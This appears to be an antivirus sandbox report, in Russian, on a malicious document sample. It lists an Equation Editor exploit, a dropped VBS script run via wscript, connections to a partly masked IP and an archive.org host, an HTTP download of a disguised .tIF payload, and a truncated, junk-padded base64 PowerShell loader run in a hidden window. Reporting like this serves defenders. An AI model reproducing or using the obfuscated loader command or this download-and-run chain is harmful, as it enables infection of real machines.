Техническая информация
Вредоносные функции
Создает и запускает на исполнение (эксплоит)
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\mugcackecholocatebutterburnm.vBS"
Загружает файлы и запускает на исполнение.
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\mugcackecholocatebutterburnm.vbs
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\i3nmat9z\config14[1].txt
Сетевая активность
Подключается к
- '45.#0.89.50':80
- 'ia#####4.us.archive.org':443
TCP
Запросы HTTP GET
- http://45.#0.89.50/224/mugcackecholocatebutterburnmix.tIF
Другие
- 'ia#####4.us.archive.org':443
UDP
- DNS ASK ia#####4.us.archive.org
Другое
Запускает на исполнение
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'J∽ Вґ ⺴ ⎰ ⪤Bp∽ Вґ ⺴ ⎰ ⪤G0∽ Вґ ⺴ ⎰ ⪤YQBn∽ Вґ ⺴ ⎰ ⪤GU∽ Вґ ⺴ ⎰ ⪤VQBy∽ Вґ ⺴ ⎰ ⪤Gw∽ Вґ ⺴ ⎰ ⪤I∽ Вґ ⺴ ⎰ ⪤∽ Вґ ⺴ ⎰ ⪤9∽ Вґ ⺴ ⎰ ⪤C∽ Вґ ⺴ ⎰ ⪤∽ Вґ ⺴ ⎰ ⪤JwBo∽ Вґ ⺴ ⎰ ⪤HQ∽ Вґ ⺴ ⎰ ⪤d∽ Вґ ⺴... (со скрытым окном)
